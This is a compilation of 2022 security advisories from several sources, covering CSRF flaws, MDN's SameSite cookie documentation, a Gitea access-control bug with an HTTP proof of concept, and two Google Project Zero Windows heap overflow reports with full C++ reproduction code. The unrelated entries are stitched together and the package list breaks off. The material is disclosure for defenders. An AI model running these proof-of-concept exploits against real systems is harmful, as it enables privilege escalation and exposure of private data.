The E Unlocked - Student Result WordPress plugin through 1.0.4 is lacking CSRF and validation when uploading the School logo, which could allow attackers to make a logged in admin upload arbitrary files, such as PHP via a CSRF attack

CVE-2022-2381

Shield is an authentication and authorization framework for CodeIgniter 4. This vulnerability may allow [SameSite Attackers](https://canitakeyoursubdomain.name/) to bypass the [CodeIgniter4 CSRF protection](https://codeigniter4.github.io/userguide/libraries/security.html) mechanism with CodeIgniter Shield. For this attack to succeed, the attacker must have direct (or indirect, e.g., XSS) control over a subdomain site (e.g., `https://a.example.com/`) of the target site (e.g., `http://example.com/`). Upgrade to **CodeIgniter v4.2.3 or later** and **Shield v1.0.0-beta.2 or later**. As a workaround: set `Config\Security::$csrfProtection` to `'session,'`remove old session data right after login (immediately after ID and password match) and regenerate CSRF token right after login (immediately after ID and password match)

**Secure context:** This feature is available only in secure contexts (HTTPS), in some or all supporting browsers.

The **SameSite** attribute of the Set-Cookie HTTP response header allows you to declare if your cookie should be restricted to a first-party or same-site context.

**Note:** Standards related to the Cookie SameSite attribute recently changed such that:

*   The cookie-sending behavior if SameSite is not specified is SameSite=Lax. Previously the default was that cookies were sent for all requests.
*   Cookies with SameSite=None must now also specify the Secure attribute (they require a secure context/HTTPS).
*   Cookies from the same domain are no longer considered to be from the same site if sent using a different scheme (http: or https:).

This article documents the new standard. See Browser Compatibility below for information about specific versions where the behavior changed.

**Values**

The SameSite attribute accepts three values:

**Lax**

Cookies are not sent on normal cross-site subrequests (for example to load images or frames into a third party site), but are sent when a user is _navigating to_ the origin site (i.e., when following a link).

This is the default cookie value if SameSite has not been explicitly specified in recent browser versions (see the "SameSite: Defaults to Lax" feature in the Browser Compatibility).

**Note:** Lax replaced None as the default value in order to ensure that users have reasonably robust defense against some classes of cross-site request forgery (CSRF) attacks.

**Strict**

Cookies will only be sent in a first-party context and not be sent along with requests initiated by third party websites.

**None**

Cookies will be sent in all contexts, i.e. in responses to both first-party and cross-site requests. If SameSite=None is set, the cookie Secure attribute must also be set (or the cookie will be blocked).

**Fixing common warnings**

**SameSite=None requires Secure**

Warnings like the ones below might appear in your console:

Cookie "myCookie" rejected because it has the "SameSite=None" attribute but is missing the "secure" attribute.

This Set-Cookie was blocked because it had the "SameSite=None" attribute but did not have the "Secure" attribute, which is required in order to use "SameSite=None".

The warning appears because any cookie that requests SameSite=None but is not marked Secure will be rejected.

    Set-Cookie: flavor=choco; SameSite=None
    

To fix this, you will have to add the Secure attribute to your SameSite=None cookies.

    Set-Cookie: flavor=choco; SameSite=None; Secure
    

A Secure cookie is only sent to the server with an encrypted request over the HTTPS protocol. Note that insecure sites (http:) can't set cookies with the Secure directive.

**Note:** On older browser versions you might get a warning that the cookie will be blocked in future. For example:

Cookie myCookie will be soon rejected because it has the SameSite attribute set to None or an invalid value, without the secure attribute.

**Cookies without SameSite default to SameSite=Lax**

Recent versions of modern browsers provide a more secure default for SameSite to your cookies and so the following message might appear in your console:

Cookie "myCookie" has "SameSite" policy set to "Lax" because it is missing a "SameSite" attribute, and "SameSite=Lax" is the default value for this attribute.

The warning appears because the SameSite policy for a cookie was not explicitly specified:

You should explicitly communicate the intended SameSite policy for your cookie (rather than relying on browsers to apply SameSite=Lax automatically). This will also improve the experience across browsers as not all of them default to Lax yet.

    Set-Cookie: flavor=choco; SameSite=Lax
    

**Example**

RewriteEngine on
RewriteBase "/"
RewriteCond "%{HTTP\_HOST}"       "^example\\.org$" \[NC\]
RewriteRule "^(.\*)"              "https://www.example.org/index.html" \[R=301,L,QSA\]
RewriteRule "^(.\*)\\.ht$"         "index.php?nav=$1 \[NC,L,QSA,CO=RewriteRule;01;https://www.example.org;30/;SameSite=None;Secure\]
RewriteRule "^(.\*)\\.htm$"        "index.php?nav=$1 \[NC,L,QSA,CO=RewriteRule;02;https://www.example.org;30/;SameSite=None;Secure\]
RewriteRule "^(.\*)\\.html$"       "index.php?nav=$1 \[NC,L,QSA,CO=RewriteRule;03;https://www.example.org;30/;SameSite=None;Secure\]
\[...\]
RewriteRule "^admin/(.\*)\\.html$" "admin/index.php?nav=$1 \[NC,L,QSA,CO=RewriteRule;09;https://www.example.org:30/;SameSite=Strict;Secure\]

**Specifications**

Specification

HTTP State Management Mechanism  
\# sane-set-cookie

Cookies: HTTP State Management Mechanism  
\# name-the-samesite-attribute

**Browser compatibility**

BCD tables only load in the browser

**See also**

CVE-2022-35943: SameSite cookies - HTTP | MDN

In Gitea before 1.16.9, it was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea (there was no permission check for fetching the issue). As a result, the attacker would get access to private issue titles.

**Advisory ID**: usd-2022-0015  
**Product**: Gitea  
**Affected Version**: < 1.16.9  
**Vulnerability Type**: CWE-284: Improper Access Control  
**Security Risk**: Medium  
**Vendor URL**: https://gitea.io/  
**Vendor Status**: Fixed  
**Advisory Status**: Closed  
**CVE number**: Pending  
**CVE Link**: Pending  
**First Published**: 2022-08-12  
**Last Update**: 2022-08-12

**Description**

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea. As a result, the attacker would get access to private issue titles.

**Proof of Concept**

The issue with ID **7** in the example below is an issue from a private repository of another user.  
The project with ID **3** is the attackers project.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: \*/\*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close
\_csrf=tvK\_ourfR\_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue\_ids=7&id=3

The attacker can see the issue (without body text).

**Fix**

It is recommended to restrict access to sensitive functions or information by default.  
Required access privileges should be granted explicitly by a global access control mechanism.

**References**

*   https://cwe.mitre.org/data/definitions/284.html
*   https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

**Timeline**

*   **2022-06-22**: vulnerability identified by Christian Pöschl
*   **2022-06-22**: First contact request
*   **2022-07-01**: Investigation started by vendor
*   **2022-07-12**: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/
*   **2022-07-15**: Vendor confirms remediation
*   **2022-08-12**: This advisory is published

**Credits**

This security vulnerability was identified by Christian Pöschl of usd AG.

CVE-2022-38183: usd-2022-0015 | Broken Access Control in Gitea - usd HeroLab

A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.

**Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow**

    Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILS```__int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src){  unsigned int Length; // ebx  SIZE_T NewMaxLength; // r8  WCHAR *Heap; // rax  __int64 Status; // rax  Length = Src->Length;  if ( (_WORD)Length )  {    NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 ***    Dst->MaximumLength = NewMaxLength;    Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 ***    Dst->Buffer = Heap;    if ( Heap )    {      memcpy_0(Heap, Src->Buffer, Length); // *** 3 ***      Dst->Buffer[(unsigned __int64)Length >> 1] = 0;      Status = 0i64;      Dst->Length = Length;    }    else    {      return 0xC0000017i64;    }  }  else  {    *(_DWORD *)&Dst->Length = 0;    Status = 0i64;    Dst->Buffer = 0i64;  }  return Status;}```The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3].The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size.## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASEThis (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string.1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#include <windows.h>#include <winternl.h>#include <string>PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0,                   size_t max_length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main(int argc, char* argv[]) {  HMODULE ntdll = LoadLibrary(L\"ntdll\");  if (argc == 1) {    STARTUPINFO si = {0};    PROCESS_INFORMATION pi = {0};    si.cb = sizeof(si);    WCHAR image_path[MAX_PATH + 1];    GetModuleFileName(NULL, image_path, MAX_PATH);    std::wstring args = image_path;    args += L\" child\";    CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, CREATE_SUSPENDED,                  NULL, NULL, &si, &pi);    PVOID csrClientConnectToServer =        GetProcAddress(ntdll, \"CsrClientConnectToServer\");    size_t offset = 0;    for (; offset < 0x1000; ++offset)      if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000)        break;    uint32_t new_size = 0x20000;    WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset,                       &new_size, sizeof(new_size), NULL);    ResumeThread(pi.hThread);  } else {#define INIT_PROC(name) \\  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));    INIT_PROC(CsrAllocateCaptureBuffer);    INIT_PROC(CsrFreeCaptureBuffer);    INIT_PROC(CsrClientCallServer);    INIT_PROC(CsrCaptureMessageString);    const size_t HEADER_SIZE = 0x40;    uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;    SET_FIELD(0, 0x900000041);    SET_FIELD(3, 0x10101);    SET_FIELD(6, 0x88);    SET_FIELD(7, -1);    std::string manifest =        \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \"        \"manifestVersion='1.0'>\"        \"<assemblyIdentity name='A' version='1.0.0.0'/>\"        \"</assembly>\";    SET_FIELD(8, manifest.c_str());    SET_FIELD(9, manifest.size());    SET_FIELD(22, 1);    PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200);    CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2);    CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\otepad.exe\");    CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\");    SET_FIELD(17, 0xfffefffe);    CsrClientCallServer(msg, capture_buffer, 0x1001001e,                        sizeof(msg) - HEADER_SIZE);  }}```4) Wait for a crash:```CONTEXT:  000000bd41a3ddc0 -- (.cxr 0xbd41a3ddc0)rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000ffferip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8 r8=000000000000002e  r9=00000000000003ff r10=000002224855c000r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001r14=000000bd41a3ee38 r15=000000bd41a3ee20iopl=0         nv up ei pl nz na po nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206ntdll!memcpy+0x113:0033:00007ffb`d59d3c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  000002224855c000 EXCEPTION_RECORD:  000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0)ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 000002224855c000Attempt to write to address 000002224855c000STACK_TEXT:  000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86000000bd`41a3ed20 00007ffb`d2f31dce : 00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project Zero**This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.**Related CVE Numbers: CVE-2022-22049,CVE-2022-22049.Found by: glazunov@google.com

Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow

**Windows sxs!CNodeFactory::XMLParser\_Element\_doc\_assembly\_assemblyIdentity Heap Buffer Overflow**

    Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILSIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASE1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#pragma comment(lib, "ntdll")#include <windows.h>#include <winternl.h>#include <cstdint>#include <cstdio>#include <string>typedef struct _SECTION_IMAGE_INFORMATION {  PVOID EntryPoint;  ULONG StackZeroBits;  ULONG StackReserved;  ULONG StackCommit;  ULONG ImageSubsystem;  WORD SubSystemVersionLow;  WORD SubSystemVersionHigh;  ULONG Unknown1;  ULONG ImageCharacteristics;  ULONG ImageMachineType;  ULONG Unknown2[3];} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;typedef struct _RTL_USER_PROCESS_INFORMATION {  ULONG Size;  HANDLE ProcessHandle;  HANDLE ThreadHandle;  CLIENT_ID ClientId;  SECTION_IMAGE_INFORMATION ImageInformation;  BYTE Unknown1[128];} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;NTSTATUS(NTAPI* RtlCreateProcessParameters)(PRTL_USER_PROCESS_PARAMETERS*, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PVOID, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING);NTSTATUS(NTAPI* RtlCreateUserProcess)(PUNICODE_STRING, ULONG, PRTL_USER_PROCESS_PARAMETERS, PSECURITY_DESCRIPTOR, PSECURITY_DESCRIPTOR, HANDLE, BOOLEAN, HANDLE, HANDLE, PRTL_USER_PROCESS_INFORMATION);PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main() {  HMODULE ntdll = LoadLibrary(L"ntdll");#define INIT_PROC(name) \  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));  INIT_PROC(RtlCreateProcessParameters);  INIT_PROC(RtlCreateUserProcess);  INIT_PROC(CsrAllocateCaptureBuffer);  INIT_PROC(CsrFreeCaptureBuffer);  INIT_PROC(CsrClientCallServer);  INIT_PROC(CsrCaptureMessageString);  UNICODE_STRING image_path;  PRTL_USER_PROCESS_PARAMETERS proc_params;  RTL_USER_PROCESS_INFORMATION proc_info = {0};  RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe");  RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,                             NULL, NULL, NULL, NULL);  RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,                       NULL, NULL, FALSE, NULL, NULL, &proc_info);  const size_t HEADER_SIZE = 0x40;  uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;  SET_FIELD(2, proc_info.ClientId.UniqueProcess);  SET_FIELD(3, proc_info.ClientId.UniqueThread);  SET_FIELD(4, -1);  SET_FIELD(7, 1);  SET_FIELD(8, 0x20000);  std::string manifest =      "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' "      "manifestVersion='1.0'>"      "<assemblyIdentity name='@' version='1.0.0.0'/>"      "</assembly>";  manifest.replace(manifest.find('@'), 1, 0x4000, 'A');  SET_FIELD(13, manifest.c_str());  SET_FIELD(14, manifest.size());  PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);  CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\");  CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2);  CaptureString(capture_buffer, FIELD(28), L"A");  SET_FIELD(28, 0xff000002);  CsrClientCallServer(msg, capture_buffer, 0x1001001d,                      sizeof(msg) - HEADER_SIZE);}```The crash should look like to the following:```CONTEXT:  0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0)rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 r8=0000000000000032  r9=00000000000001f7 r10=00007ff822e6b558r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001r14=0000000000000000 r15=0000000000000005iopl=0         nv up ei pl nz na pe nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202ntdll!memcpy+0x113:0033:00007ff8`25a53c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  0000020e6515d000EXCEPTION_RECORD:  0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0)ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 0000020e6515d000Attempt to write to address 0000020e6515d000STACK_TEXT:0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x1130000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c10000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd340000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d60000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x5130000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x1040000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x3390000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x5450000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x710000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f30000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d00000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project ZeroRelated CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.Found by: glazunov@google.com

Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow

Red Hat Security Advisory 2022-6043-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.108 and .NET Runtime 6.0.8.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6043-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6043  
Issue date:        2022-08-10  
CVE Names:         CVE-2022-34716  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.108 and .NET Runtime  
6.0.8.

Security Fix(es):

* dotnet: External Entity Injection during XML signature verification  
(CVE-2022-34716)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2115183 - CVE-2022-34716 dotnet: External Entity Injection during XML signature verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet6.0-6.0.108-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.x86_64.rpm  
